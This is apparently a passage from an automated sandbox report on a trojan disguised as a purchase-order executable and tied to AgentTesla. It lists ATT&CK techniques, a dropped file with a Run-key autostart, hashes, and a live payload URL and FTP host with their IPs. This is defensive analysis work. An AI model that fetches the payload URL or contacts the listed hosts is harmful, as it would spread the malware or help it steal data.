Source: Yara match	File source: 00000008.00000002.1413730064.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1441897050.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1409827566.0000000003196000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2503048867.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1544555962.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1515623045.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Iujcy.exe PID: 8044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Iujcy.exe PID: 5428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7216, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	311 Process Injection	2 Obfuscated Files or Information	1 Credentials in Registry	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Software Packing	Security Account Manager	311 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	141 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	32%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	32%	Virustotal		Browse
PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	100%	Avira	HEUR/AGEN.1310836
PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Iujcy.exe	100%	Avira	HEUR/AGEN.1310836
C:\Users\user\AppData\Roaming\Iujcy.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Iujcy.exe	32%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\Iujcy.exe	32%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
wymascensores.com	11%	Virustotal		Browse
ftp.alternatifplastik.com	3%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://stackoverflow.com/q/14436606/23354	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
https://stackoverflow.com/q/11564914/23354;	0%	URL Reputation	safe
https://stackoverflow.com/q/2152978/23354	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://github.com/mgravell/protobuf-neti	0%	Virustotal		Browse
https://wymascensores.com/ozeli/Xibknlpkg.vdf	10%	Virustotal		Browse
https://github.com/mgravell/protobuf-net	0%	Virustotal		Browse
http://ftp.alternatifplastik.com	3%	Virustotal		Browse
https://github.com/mgravell/protobuf-netJ	0%	Virustotal		Browse
https://wymascensores.com/ozeli/Xibknlpkg.vdf18p6Mu3xADDSL	10%	Virustotal		Browse
https://wymascensores.com	6%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wymascensores.com	67.212.175.162	true	false	11%, Virustotal, Browse	unknown
ftp.alternatifplastik.com	5.2.84.236	true	true	3%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://wymascensores.com/ozeli/Xibknlpkg.vdf	true	10%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/mgravell/protobuf-neti	PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://stackoverflow.com/q/14436606/23354	PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000025E7000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1409827566.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.00000000027F7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.dyn.com/	PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000029BA000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1406060277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1441897050.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1409827566.0000000003196000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1441897050.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1544555962.00000000038FB000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1544555962.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-netJ	PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://stackoverflow.com/q/11564914/23354;	PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/2152978/23354	PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-net	PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://wdcp.micros	Iujcy.exe, 0000000D.00000002.1548837966.0000000005B60000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://wymascensores.com	PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1409827566.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.00000000027DE000.00000004.00000800.00020000.00000000.sdmp	true	6%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1413730064.0000000002CCE000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1409827566.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.1516278275.000000000315E000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2503048867.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ftp.alternatifplastik.com	InstallUtil.exe, 00000008.00000002.1413730064.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1413730064.0000000002CCE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.1516278275.000000000315E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.1516278275.000000000316C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2503048867.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2503048867.000000000300C000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse	unknown
https://wymascensores.com/ozeli/Xibknlpkg.vdf18p6Mu3xADDSL	PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, Iujcy.exe.0.dr	true	10%, Virustotal, Browse	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
67.212.175.162	wymascensores.com	United States		32475	SINGLEHOP-LLCUS	false
5.2.84.236	ftp.alternatifplastik.com	Turkey		3188	ALASTYRTR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1525500
Start date and time:	2024-10-04 10:40:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/2@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 468 Number of non-executed functions: 39
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:48:06	API Interceptor	22x Sleep call for process: Iujcy.exe modified
10:41:07	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Iujcy C:\Users\user\AppData\Roaming\Iujcy.exe
10:41:15	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Iujcy C:\Users\user\AppData\Roaming\Iujcy.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
67.212.175.162	BITUMEN_60-70_-_JUMBO_Specification.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.northjerseylocksmith.net/2nbp/?ab=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1g60uhCq/kzTYQUQ==&wZHp=LTklpdd0lp
67.212.175.162	EL-515-_HEAT_TRACING.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.northjerseylocksmith.net/2nbp/?I8Z=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1tnGq8XaOUlQYxDpzveej3TzCy&WN6=OLgLTlRhCRRxTxN
5.2.84.236	inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe	Get hash	malicious	AgentTesla	Browse
	PO_9876563647-FLOWTRONIX (FT)UUE.exe	Get hash	malicious	AgentTesla	Browse
	Richardson Electronics, LTD. PRD10221301UUE.exe	Get hash	malicious	AgentTesla	Browse
	PURCHASE ORDER ADDISON-6378397379UUE.exe	Get hash	malicious	AgentTesla	Browse
	Teklif-6205018797-6100052155-UUE.exe	Get hash	malicious	AgentTesla	Browse
	Offer-CNVN-82927-VIETNAM.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	OFFER-876355- Hydraulic Partner, LLC.PDF..........................exe	Get hash	malicious	AgentTesla	Browse
	Product Specification Details 8576534-872.exe	Get hash	malicious	AgentTesla	Browse
	Teklif 8822321378 .exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=http://5ln.gpr.carfield.com.tr./?YYY%3A%2F%2F%23.bWljaGFlbC5keWtlc0BjZXFsZC5vcmcuYXU=	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
wymascensores.com	RFQ__PO_PO 24090041-PDF____PDF.exe	Get hash	malicious	AgentTesla	Browse	67.212.175.162
	PO_9876563647-FLOWTRONIX (FT)UUE.exe	Get hash	malicious	AgentTesla	Browse	67.212.175.162
	Richardson Electronics, LTD. PRD10221301UUE.exe	Get hash	malicious	AgentTesla	Browse	67.212.175.162
	PURCHASE ORDER ADDISON-6378397379UUE.exe	Get hash	malicious	AgentTesla	Browse	67.212.175.162
	Teklif-6205018797-6100052155-UUE.exe	Get hash	malicious	AgentTesla	Browse	67.212.175.162
	RFQ____RM quotation_JPEG IMAGE.img.exe	Get hash	malicious	Snake Keylogger	Browse	67.212.175.162
	Su documento de env#U00edo--------pdf.exe	Get hash	malicious	Unknown	Browse	67.212.175.162
	Su documento de env#U00edo--------pdf.exe	Get hash	malicious	Unknown	Browse	67.212.175.162
	1715875158543a5e3b677362bc060cf9b6a7a69e2457d0c48ef2d6bda0e2ce3c4ddc38a017752.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	67.212.175.162
ftp.alternatifplastik.com	inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe	Get hash	malicious	AgentTesla	Browse	5.2.84.236
	PO_9876563647-FLOWTRONIX (FT)UUE.exe	Get hash	malicious	AgentTesla	Browse	5.2.84.236
	Richardson Electronics, LTD. PRD10221301UUE.exe	Get hash	malicious	AgentTesla	Browse	5.2.84.236
	PURCHASE ORDER ADDISON-6378397379UUE.exe	Get hash	malicious	AgentTesla	Browse	5.2.84.236
	Teklif-6205018797-6100052155-UUE.exe	Get hash	malicious	AgentTesla	Browse	5.2.84.236
	Offer-CNVN-82927-VIETNAM.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	5.2.84.236
	OFFER-876355- Hydraulic Partner, LLC.PDF..........................exe	Get hash	malicious	AgentTesla	Browse	5.2.84.236
	Product Specification Details 8576534-872.exe	Get hash	malicious	AgentTesla	Browse	5.2.84.236

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SINGLEHOP-LLCUS	RFQ__PO_PO 24090041-PDF____PDF.exe	Get hash	malicious	AgentTesla	Browse	67.212.175.162
	https://novanutrix.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/	Get hash	malicious	Unknown	Browse	198.143.164.252
	https://novanutrix.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/	Get hash	malicious	Unknown	Browse	198.143.164.252
	yakov.ppc.elf	Get hash	malicious	Mirai	Browse	198.20.85.251
	inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe	Get hash	malicious	AgentTesla	Browse	67.212.175.162
	PO_9876563647-FLOWTRONIX (FT)UUE.exe	Get hash	malicious	AgentTesla	Browse	67.212.175.162
	https://sandbox-2.digital68.com/	Get hash	malicious	Unknown	Browse	198.143.164.252
	https://ebookkeepers.com.pk/	Get hash	malicious	Unknown	Browse	198.143.164.252
	http://dev-bdvonlinecreditos.pantheonsite.io/	Get hash	malicious	Unknown	Browse	198.143.164.252
	https://dev-bdvemprendeven.pantheonsite.io/	Get hash	malicious	Unknown	Browse	198.143.164.252
ALASTYRTR	inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe	Get hash	malicious	AgentTesla	Browse	5.2.84.236
	PO_9876563647-FLOWTRONIX (FT)UUE.exe	Get hash	malicious	AgentTesla	Browse	5.2.84.236
	Richardson Electronics, LTD. PRD10221301UUE.exe	Get hash	malicious	AgentTesla	Browse	5.2.84.236
	PURCHASE ORDER ADDISON-6378397379UUE.exe	Get hash	malicious	AgentTesla	Browse	5.2.84.236
	Teklif-6205018797-6100052155-UUE.exe	Get hash	malicious	AgentTesla	Browse	5.2.84.236
	BROU_Copia de Pago_PDF.exe	Get hash	malicious	Unknown	Browse	5.2.84.221
	BROU_Copia de Pago_PDF.exe	Get hash	malicious	Unknown	Browse	5.2.84.221
	Offer-CNVN-82927-VIETNAM.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	5.2.84.236
	eqqjbbjMlt.elf	Get hash	malicious	Unknown	Browse	5.2.85.36
	OFFER-876355- Hydraulic Partner, LLC.PDF..........................exe	Get hash	malicious	AgentTesla	Browse	5.2.84.236

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	PDFDQ_P01_303B9367_2024-10-03_185650.vbs	Get hash	malicious	Remcos	Browse	67.212.175.162
	z1PurchaseOrder.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	67.212.175.162
	RFQ__PO_PO 24090041-PDF____PDF.exe	Get hash	malicious	AgentTesla	Browse	67.212.175.162
	New order.exe	Get hash	malicious	AgentTesla	Browse	67.212.175.162
	Refrence-Order#63729.pdf	Get hash	malicious	Azorult	Browse	67.212.175.162
	ra66DSpa.exe	Get hash	malicious	XWorm	Browse	67.212.175.162
	https://www.sexpartnercommunity.com/?e7ak3e0m=57296397&tba4bck7=eyJpdiI6Imp1cHMxdGJERWI4SjBwNVYvSWdWeHc9PSIsInZhbHVlIjoiSGhGdTY1TlFyN1JJQm03UEJhZGZxQjV2NncyZ0JWajdJZnRWaWNBZlM2dzVxV05KdGx3TXZaaURxZzgraDNUYURDK2EwcFUra28rNEE2YTdRYWRhdFdwQkxaL09xeDRCVUt0Rm1IT3cxa3hPd1huM3FkN3NzNS9BYjEwV2hOY3dzblZ6TW1TaUdDeXBOTG9zc2FtU0VZKzhNeVgzS1FkTnE3WnA5NUZqWXJTQkVaNlN1UmUrZFFTUlZzZ05pbVlnIiwibWFjIjoiOTFjZDc5Y2FhNTBkNGYyYWYzZDRiYzhlYjljMjZmYTE1MzBhNGI2MmQ0NTFhYmYyZmVjN2IwMGUyNmFlNjU3MCIsInRhZyI6IiJ9&spaRoute=/livecams/all&trk=toza80h	Get hash	malicious	Unknown	Browse	67.212.175.162
	http://masdeliveryusa.com/	Get hash	malicious	Unknown	Browse	67.212.175.162
	file.exe	Get hash	malicious	Credential Flusher	Browse	67.212.175.162
	tMREqVW0.exe	Get hash	malicious	XWorm	Browse	67.212.175.162

Process:	C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1559040
Entropy (8bit):	5.6989027725883386
Encrypted:	false
SSDEEP:	24576:kaX/AV0ieMwOd02MecuTCExaiQB/XpbbFIZ3:kG/AeieMnxGJ
MD5:	96A7EC39104585A6DEDC95933DD9AC66
SHA1:	3DCBB5B705081EA3A822BCC29D0BCC85626D45ED
SHA-256:	44562817CA024E665E0C44FA1911E74D210F938A29518CE0B186A11BBFF1FF72
SHA-512:	3F0B6F60B1DBAAC04C137AF09BC5E663FEBA457091A27B79543D73FFE467BFA4EE61F0D151833ADA62A1849CFA207F662F10114E0C966C2063C29F360E412E27
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 32% Antivirus: Virustotal, Detection: 32%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.f................................. ........@.. ....................... ............`.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........p...m...........>...2..........................................s.k....?.En....?.p.{...?...pP..?_ .&C..?&;..\|..?...\6.?....\|b.?..E.Y..?..:.>b.?..T....?.......?.G..F..?.......?V.5...?......?A@.....?.tb.C#.?^.q.a..?V...v.?..?u...?...6..?\|.\g.?..G..?.B.I...?9...a.?A.rr..y?..h%<.n?.+..V:b?.qKx..T?.G..F?...V.[8?.@:.,.(?...J"..?4..)...?..I.,a.>.s..4..>...Y...>..)-.g.>."..:.>..=l...>..b..c>w K ..D>t.dC.$>.......>.1.....=b.{....=.......=E.z.<gv....>.p?Z...S.v?

C:\Users\user\AppData\Roaming\Iujcy.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.6989027725883386
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
File size:	1'559'040 bytes
MD5:	96a7ec39104585a6dedc95933dd9ac66
SHA1:	3dcbb5b705081ea3a822bcc29d0bcc85626d45ed
SHA256:	44562817ca024e665e0c44fa1911e74d210f938a29518ce0b186a11bbff1ff72
SHA512:	3f0b6f60b1dbaac04c137af09bc5e663feba457091a27b79543d73ffe467bfa4ee61f0d151833ada62a1849cfa207f662f10114e0c966c2063c29f360e412e27
SSDEEP:	24576:kaX/AV0ieMwOd02MecuTCExaiQB/XpbbFIZ3:kG/AeieMnxGJ
TLSH:	AF756D8CF794FA23D56D737A64B545208B34C042A3D3AB4B6994D9F06E0BBD41D0E2EB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.f................................. ........@.. ....................... ............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x57defe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66FE3BE0 [Thu Oct 3 06:38:24 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17deac	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17e000	0x5a6	.rsrc
